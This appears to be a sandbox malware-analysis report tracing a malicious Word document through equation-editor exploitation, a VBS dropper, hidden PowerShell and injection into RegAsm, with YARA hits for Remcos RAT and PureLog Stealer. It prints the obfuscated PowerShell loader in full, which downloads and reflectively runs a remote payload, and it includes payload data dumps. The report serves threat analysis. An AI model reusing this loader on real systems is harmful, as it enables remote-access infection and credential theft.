                        Data Ascii: AAOK7///8RADp/AAAAIAQAAAA4nf///xECOqIAAAAgAAAAAH7FCAAEe8MIAAQ6gv///yYgAAAAADh3////AAIopAMABiACAAAAfsUIAAR7vggABDpc////JiADAAAAOFH///8AKgADFCiyAwAGEwAgBQAAADg7////ODAAAAAgCAAAAP4OAQA4JP///wAgJGvC6SAXGPOwYX7FCAAEe8AIAARhKK0DAAYosQQABnoCe7MAAAQTAiAHAAAAOPT+/
                        2024-09-26 08:33:09 UTC | 16384 | IN | Data Raw: 4d 41 41 41 45 6f 38 67 4d 41 42 69 6a 7a 41 77 41 47 45 78 51 67 42 51 41 41 41 48 37 46 43 41 41 45 65 78 49 4a 41 41 51 36 42 65 66 2f 2f 79 59 67 41 51 41 41 41 44 6a 36 35 76 2f 2f 41 41 4b 6c 6c 51 41 41 41 58 4f 4d 41 51 41 4b 6a 4a 63 41 41 41 45 54 41 79 41 67 41 41 41 41 4f 4e 33 6d 2f 2f 38 41 45 51 48 51 43 67 41 41 41 53 6a 79 41 77 41 47 4b 50 4d 44 41 41 59 54 48 79 41 4b 41 41 41 41 4f 4c 2f 6d 2f 2f 38 34 73 4f 2f 2f 2f 79 41 4c 41 41 41 41 66 73 55 49 41 41 52 37 33 77 67 41 42 44 71 6d 35 76 2f 2f 4a 69 42 4a 41 41 41 41 4f 4a 76 6d 2f 2f 38 34 32 50 72 2f 2f 79 42 32 41 41 41 41 4f 49 7a 6d 2f 2f 38 41 41 6d 38 6c 41 41 41 4b 4b 4b 49 41 41 41 6f 6f 41 41 51 41 42 6f 79 57 41 41 41 42 45 77 4d 67 44 77 41 41 41 50 34 4f 4c 67 41 34 59
                        Data Ascii: MAAAEo8gMABijzAwAGExQgBQAAAH7FCAAEexIJAAQ6Bef//yYgAQAAADj65v//AAKllQAAAXOMAQAKjJcAAAETAyAgAAAAON3m//8AEQHQCgAAASjyAwAGKPMDAAYTHyAKAAAAOL/m//84sO///yALAAAAfsUIAAR73wgABDqm5v//JiBJAAAAOJvm//842Pr//yB2AAAAOIzm//8AAm8lAAAKKKIAAAooAAQABoyWAAABEwMgDwAAAP4OLgA4Y
                        2024-09-26 08:33:09 UTC | 16384 | IN | Data Raw: 45 41 41 41 42 2b 78 51 67 41 42 48 76 71 43 41 41 45 4f 53 37 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 49 2f 2f 2f 2f 77 41 54 4d 41 51 41 52 67 41 41 41 4d 73 41 41 42 45 41 41 67 4d 45 4b 50 30 42 41 41 6f 41 41 6e 76 38 41 51 41 4b 4f 68 67 41 41 41 41 44 46 6a 38 52 41 41 41 41 41 77 49 6f 2f 67 45 41 43 76 34 43 46 76 34 42 4f 41 45 41 41 41 41 57 43 67 59 35 45 41 41 41 41 41 41 43 65 2f 51 42 41 41 6f 44 42 47 2f 65 41 51 41 4b 41 41 41 71 41 41 41 54 4d 41 51 41 6c 51 45 41 41 41 51 41 41 42 45 67 41 77 41 41 41 50 34 4f 41 41 41 34 41 41 41 41 41 50 34 4d 41 41 42 46 43 77 41 41 41 4b 77 41 41 41 43 48 41 41 41 41 30 77 41 41 41 4f 49 41 41 41 42 55 41 41 41 41 4b 51 41 41 41 41 55 41 41 41 42 45 41 41 41 41 47 67 45 41 41 50 51 41 41 41 43 71 41
                        Data Ascii: EAAAB+xQgABHvqCAAEOS7///8mIAEAAAA4I////wATMAQARgAAAMsAABEAAgMEKP0BAAoAAnv8AQAKOhgAAAADFj8RAAAAAwIo/gEACv4CFv4BOAEAAAAWCgY5EAAAAAACe/QBAAoDBG/eAQAKAAAqAAATMAQAlQEAAAQAABEgAwAAAP4OAAA4AAAAAP4MAABFCwAAAKwAAACHAAAA0wAAAOIAAABUAAAAKQAAAAUAAABEAAAAGgEAAPQAAACqA
                        2024-09-26 08:33:09 UTC | 16384 | IN | Data Raw: 41 44 41 6e 74 45 41 67 41 4b 2f 67 51 4c 42 7a 6b 67 41 41 41 41 41 41 4a 37 52 51 49 41 43 67 4d 43 65 30 55 43 41 41 6f 44 46 31 67 43 65 30 51 43 41 41 6f 44 57 53 6a 51 41 51 41 4b 41 41 41 43 65 30 55 43 41 41 6f 44 42 4b 51 31 41 41 41 62 41 67 4a 37 52 41 49 41 43 68 64 59 66 55 51 43 41 41 6f 71 41 41 41 54 4d 41 4d 41 54 77 41 41 41 41 4d 42 41 42 45 41 41 6e 74 45 41 67 41 4b 43 6a 67 75 41 41 41 41 41 41 59 58 57 51 6f 43 65 30 55 43 41 41 6f 47 6f 7a 55 41 41 42 75 4d 4e 51 41 41 47 77 4f 4d 4e 51 41 41 47 2f 34 42 43 77 63 35 43 41 41 41 41 41 41 47 44 44 67 54 41 41 41 41 41 41 59 57 2f 67 49 4e 43 54 72 48 2f 2f 2f 2f 46 51 77 34 41 41 41 41 41 41 67 71 41 42 4d 77 41 77 41 74 41 41 41 41 62 41 41 41 45 51 41 43 41 79 6a 47 41 51 41 4b 43
                        Data Ascii: ADAntEAgAK/gQLBzkgAAAAAAJ7RQIACgMCe0UCAAoDF1gCe0QCAAoDWSjQAQAKAAACe0UCAAoDBKQ1AAAbAgJ7RAIAChdYfUQCAAoqAAATMAMATwAAAAMBABEAAntEAgAKCjguAAAAAAYXWQoCe0UCAAoGozUAABuMNQAAGwOMNQAAG/4BCwc5CAAAAAAGDDgTAAAAAAYW/gINCTrH////FQw4AAAAAAgqABMwAwAtAAAAbAAAEQACAyjGAQAKC



                        Target ID:0
                        Start time:04:32:58
                        Start date:26/09/2024
                        Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                        Wow64 process (32bit):false
                        Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                        Imagebase:0x13fa30000
                        File size:1'423'704 bytes
                        MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:false

                        Target ID:2
                        Start time:04:32:59
                        Start date:26/09/2024
                        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                        Wow64 process (32bit):true
                        Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                        Imagebase:0x400000
                        File size:543'304 bytes
                        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:5
                        Start time:04:33:03
                        Start date:26/09/2024
                        Path:C:\Windows\SysWOW64\wscript.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\makepicturewithgreatthingstobeon.vBS"
                        Imagebase:0x7e0000
                        File size:141'824 bytes
                        MD5 hash:979D74799EA6C8B8167869A68DF5204A
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:6
                        Start time:04:33:04
                        Start date:26/09/2024
                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                        Imagebase:0x11d0000
                        File size:427'008 bytes
                        MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:8
                        Start time:04:33:05
                        Start date:26/09/2024
                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $pSHOmE[4]+$PSHOME[34]+'X')( ('HqRur'+'l '+'= '+'VUF'+'ht'+'t'+'ps://i'+'a6'+'00100.us.archive.or'+'g/'+'24/it'+'ems/d'+'e'+'ta'+'h-no'+'t'+'e-v/De'+'t'+'ahNote'+'V.txtVU'+'F'+';HqRba'+'se64'+'C'+'ontent = (New'+'-Obje'+'ct'+' Sys'+'tem'+'.N'+'e'+'t.We'+'b'+'C'+'li'+'e'+'nt'+')'+'.Downl'+'o'+'adS'+'tri'+'ng(HqRurl);HqRbi'+'naryContent = [S'+'ystem.C'+'o'+'n'+'vert]::FromBas'+'e64Stri'+'ng(HqRbase'+'64C'+'ont'+'ent);HqR'+'as'+'sembly'+' = [R'+'eflection.As'+'sem'+'bly]::Load(H'+'qRb'+'inar'+'yC'+'on'+'t'+'ent);'+'Hq'+'Rtype ='+' '+'H'+'qRasse'+'mbly.GetType(V'+'UFRun'+'P'+'E.'+'HomeVUF'+');H'+'qR'+'met'+'hod = HqRt'+'ype.GetMet'+'hod('+'VUFVA'+'IVUF);HqRmet'+'hod.Invoke(HqR'+'null'+', [object[]]@(VU'+'Ftxt.'+'VBGR/'+'05'+'5/2'+'5'+'.01.92.58'+'1//:'+'ptthVUF , '+'VUFd'+'esa'+'t'+'iv'+'ad'+'oVUF '+','+' VU'+'Fd'+'esati'+'v'+'ad'+'oV'+'UF'+' '+','+' V'+'UFde'+'s'+'ati'+'vadoVUF,'+'VUFRe'+'gAsmV'+'UF,VUFV'+'UF))').Replace(([cHAr]72+[cHAr]113+[cHAr]82),[StRIng][cHAr]36).Replace(([cHAr]86+[cHAr]85+[cHAr]70),[StRIng][cHAr]39) )"
                        Imagebase:0x11d0000
                        File size:427'008 bytes
                        MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.385255527.00000000063D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.383266190.0000000004289000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000008.00000002.383266190.0000000003889000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.383266190.0000000003889000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.383266190.0000000003889000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.383266190.0000000003889000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                        Reputation:high
                        Has exited:true

                        Target ID:9
                        Start time:04:33:12
                        Start date:26/09/2024
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        Imagebase:0xdc0000
                        File size:64'704 bytes
                        MD5 hash:8FE9545E9F72E460723F484C304314AD
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.884633008.0000000000795000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.884633008.00000000007C9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.884633008.00000000007B1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                        Reputation:high
                        Has exited:false

                        Target ID:11
                        Start time:04:33:17
                        Start date:26/09/2024
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nkbubgbtxayytawgovuosmgrcf"
                        Imagebase:0xdc0000
                        File size:64'704 bytes
                        MD5 hash:8FE9545E9F72E460723F484C304314AD
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:12
                        Start time:04:33:17
                        Start date:26/09/2024
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nkbubgbtxayytawgovuosmgrcf"
                        Imagebase:0xdc0000
                        File size:64'704 bytes
                        MD5 hash:8FE9545E9F72E460723F484C304314AD
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:13
                        Start time:04:33:17
                        Start date:26/09/2024
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nkbubgbtxayytawgovuosmgrcf"
                        Imagebase:0xdc0000
                        File size:64'704 bytes
                        MD5 hash:8FE9545E9F72E460723F484C304314AD
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:14
                        Start time:04:33:17
                        Start date:26/09/2024
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\xngebzmuliqlvokkyghpdzaillbyo"
                        Imagebase:0xdc0000
                        File size:64'704 bytes
                        MD5 hash:8FE9545E9F72E460723F484C304314AD
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:15
                        Start time:04:33:17
                        Start date:26/09/2024
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ahlxcrfozqiqgugoprcrgenrualhhmmku"
                        Imagebase:0xdc0000
                        File size:64'704 bytes
                        MD5 hash:8FE9545E9F72E460723F484C304314AD
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:16
                        Start time:04:33:22
                        Start date:26/09/2024
                        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                        Wow64 process (32bit):true
                        Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                        Imagebase:0x400000
                        File size:543'304 bytes
                        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:false

                        Target ID:20
                        Start time:04:35:15
                        Start date:26/09/2024
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\muezvmgbhtns"
                        Imagebase:0xdc0000
                        File size:64'704 bytes
                        MD5 hash:8FE9545E9F72E460723F484C304314AD
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:21
                        Start time:04:35:15
                        Start date:26/09/2024
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qjmo"
                        Imagebase:0xdc0000
                        File size:64'704 bytes
                        MD5 hash:8FE9545E9F72E460723F484C304314AD
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:22
                        Start time:04:35:15
                        Start date:26/09/2024
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qjmo"
                        Imagebase:0xdc0000
                        File size:64'704 bytes
                        MD5 hash:8FE9545E9F72E460723F484C304314AD
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:23
                        Start time:04:35:15
                        Start date:26/09/2024
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\wjfueylyjgoymkoaaythvh"
                        Imagebase:0xdc0000
                        File size:64'704 bytes
                        MD5 hash:8FE9545E9F72E460723F484C304314AD
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                          Memory Dump Source
                          • Source File: 00000006.00000002.385725982.000000000012D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0012D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_12d000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2091b79f7fb5b1d3f5f822ecd68e8be5788d40e77111e23f9dac3861139edf64
                          • Instruction ID: 7b57b3ce6fc4d2c926b1b4411e66c9d1c09d9a77d675cd825db78eb80700ff90
                          • Opcode Fuzzy Hash: 2091b79f7fb5b1d3f5f822ecd68e8be5788d40e77111e23f9dac3861139edf64
                          • Instruction Fuzzy Hash: 0D018C6140D3D09FD7124B25EC947A2BFA4DF43224F1984DBE8848F2A7C2689C49C772
                          Memory Dump Source
                          • Source File: 00000006.00000002.385725982.000000000012D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0012D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_12d000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2bd890f622bfaa716a76d3ae9127d62defe085eec9f6185bcbe353b636db4d8e
                          • Instruction ID: 667d3f080c3f2c3b691af0a78b4b2a21bf88e9f809f8b8f479bb36c6fbb58e9f
                          • Opcode Fuzzy Hash: 2bd890f622bfaa716a76d3ae9127d62defe085eec9f6185bcbe353b636db4d8e
                          • Instruction Fuzzy Hash: 6801D471404350AAE7204E15F884B66BFD8DF41324F28841AFC444A2A6C7799845C6B5

                          Execution Graph

                          Execution Coverage:4.2%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:0%
                          Total number of Nodes:74
                          Total number of Limit Nodes:1

                          Control-flow Graph

                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.382408222.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_260000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: SjP
                          • API String ID: 0-1466192239
                          • Opcode ID: b6d98e22abf4b9a4b23826aba03269595e02b1b5bffd0300bac80cf7ed7c988e
                          • Instruction ID: 8edc9bbb5195cd56085c8620756b88896ba6701ed011757d36f19d701ae5c491
                          • Opcode Fuzzy Hash: b6d98e22abf4b9a4b23826aba03269595e02b1b5bffd0300bac80cf7ed7c988e
                          • Instruction Fuzzy Hash: 59A13E74E15218CFDB44DFA4E8486AEBBF1FF99300F20802AE905A77A5DB745995CF40

                          Control-flow Graph

                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.382408222.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_260000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: SjP
                          • API String ID: 0-1466192239
                          • Opcode ID: 24f7125c903361211748e9f4ffb5e9e1846ca83fa3d6011a3d755a359ab55b59
                          • Instruction ID: 297dcfe44674092a5e8ed7f879a1f7987350954133e1b7fc69dfd3a3a3ebfb05
                          • Opcode Fuzzy Hash: 24f7125c903361211748e9f4ffb5e9e1846ca83fa3d6011a3d755a359ab55b59
                          • Instruction Fuzzy Hash: 4DA11074E15218CFDB44DFA4E8486AEBBF1FF99300F208029E905A77A5DB745995CF40

                          Control-flow Graph

                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.382408222.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_260000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: E>I
                          • API String ID: 0-3352654960
                          • Opcode ID: cc4f4a1c0364068f24d0186fa4e72b76474a4e0898190163e22ccbd6384320a4
                          • Instruction ID: 61dc12acedd70eed269c9e198ba6ef7b570bbfa4b2ea545773f868682a69fd04
                          • Opcode Fuzzy Hash: cc4f4a1c0364068f24d0186fa4e72b76474a4e0898190163e22ccbd6384320a4
                          • Instruction Fuzzy Hash: 14713A38A14208CFDB54DF68D894BADBBF1BB49300F51C4AAD40AA7395DB749E85CF01

                          Control-flow Graph

                          APIs
                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 010208DF
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.382691132.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1020000_powershell.jbxd
                          Similarity
                          • API ID: CreateProcess
                          • String ID: 0($0($0(
                          • API String ID: 963392458-1909826909
                          • Opcode ID: 9fde6965dc503d15ec7a2ff4d0a6138df2b1fff262d014aaabf75186e1cb8360
                          • Instruction ID: 85809c9e3a061a3e4db5332719b6cb4c60b275caa473cbdb5ba57b2237f5185e
                          • Opcode Fuzzy Hash: 9fde6965dc503d15ec7a2ff4d0a6138df2b1fff262d014aaabf75186e1cb8360
                          • Instruction Fuzzy Hash: C1C11671D002298FDB25CFA8C8447EEBBF1BF49300F0491A9E859B7254DB749A85CF85

                          Control-flow Graph

                          APIs
                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 010208DF
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.382691132.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1020000_powershell.jbxd
                          Similarity
                          • API ID: CreateProcess
                          • String ID: 0($0($0(
                          • API String ID: 963392458-1909826909
                          • Opcode ID: ca817d2be4a47abd33a4ad6cd9c90fba06cf2387fa61084ac550918b679cf656
                          • Instruction ID: 3452511bdced58bd22e445008f67409e425fd8239ab828a6c99f8f0a92b9fda1
                          • Opcode Fuzzy Hash: ca817d2be4a47abd33a4ad6cd9c90fba06cf2387fa61084ac550918b679cf656
                          • Instruction Fuzzy Hash: 96C11771D002298FDB25CFA8C8447EEBBF1BF49300F0491A9E959B7254DB749A85CF85

                          Control-flow Graph

                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.382501935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_420000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'p$4'p$$p$$p$$p
                          • API String ID: 0-2334450948
                          • Opcode ID: c52ae13f865b2860d7c35816e485296453d55aaebb36239edb376710bbdb5b90
                          • Instruction ID: a8e07a1e7fea18157439f4f72b60eb26255bce726624556f6708740fc2608a95
                          • Opcode Fuzzy Hash: c52ae13f865b2860d7c35816e485296453d55aaebb36239edb376710bbdb5b90
                          • Instruction Fuzzy Hash: 8741E4317003258FDB285AB8B41067BBBE2AFD0314BE4846BD4418B392DF79DD41C75A

                          Control-flow Graph

                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.382501935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_420000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: @X$@X$tPp$tPp
                          • API String ID: 0-25804276
                          • Opcode ID: 9753b0bd03a53d680de108f20594c30cbcddfe7373d2a69c4ea34355aee4f64a
                          • Instruction ID: 0a86840561b857d5d40e9503de7ac2b9444754ce05e290eff31f4528d051a664
                          • Opcode Fuzzy Hash: 9753b0bd03a53d680de108f20594c30cbcddfe7373d2a69c4ea34355aee4f64a
                          • Instruction Fuzzy Hash: 78910530B04350AFC724DB68D951A2ABBF2EF86310F6881ABD4459F392CAB5DC42C755

                          Control-flow Graph

                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.382501935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_420000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: (op$(op
                          • API String ID: 0-3902484270
                          • Opcode ID: ca6814192dd68261e65dedd9a7d09c72c061583328bc7f9cabeb52d3f3934df0
                          • Instruction ID: 2ed93d3509689484cbbdb1546a3888df0ad7a4ebdee8f7f47648e4a088e68599
                          • Opcode Fuzzy Hash: ca6814192dd68261e65dedd9a7d09c72c061583328bc7f9cabeb52d3f3934df0
                          • Instruction Fuzzy Hash: 8241E131B00214DFDB189E68E844BAFB7A2AB94311FA4C46BE9158B2A1CB35CD52CB45

                          Control-flow Graph

                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.382501935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_420000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'p$4'p
                          • API String ID: 0-3973980265
                          • Opcode ID: 3928480158e4aaa87c5a08389d3023111836b1c3726ec91bd6b87f2c8c828fc2
                          • Instruction ID: f01de772f0ba7f06973d54f4d46685db3509bd2a3795e75c52146a2186838a65
                          • Opcode Fuzzy Hash: 3928480158e4aaa87c5a08389d3023111836b1c3726ec91bd6b87f2c8c828fc2
                          • Instruction Fuzzy Hash: 1AE068327043048ACB586664E0203ADBBA1AFC2220FA5849BC4808321BCA38CC46C357

                          Control-flow Graph

                          APIs
                          • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0102035B
                          Memory Dump Source
                          • Source File: 00000008.00000002.382691132.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1020000_powershell.jbxd
                          Similarity
                          • API ID: MemoryProcessWrite
                          • String ID:
                          • API String ID: 3559483778-0
                          • Opcode ID: 3e62486824d8c2b2353b8d8e58baef6f6d93b2536ddd0de0c36eed7e31dc4924
                          • Instruction ID: 6df8765c2fe50f91f5f4b6095bb7decf776bb7419cb35a9297953e6791489941
                          • Opcode Fuzzy Hash: 3e62486824d8c2b2353b8d8e58baef6f6d93b2536ddd0de0c36eed7e31dc4924
                          • Instruction Fuzzy Hash: 7541AAB5D012589FCF00CFA9D984AEEFBF1BB49314F24942AE818B7254D334AA45CF64

                          Control-flow Graph

                          APIs
                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 010200EF
                          Memory Dump Source
                          • Source File: 00000008.00000002.382691132.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1020000_powershell.jbxd
                          Similarity
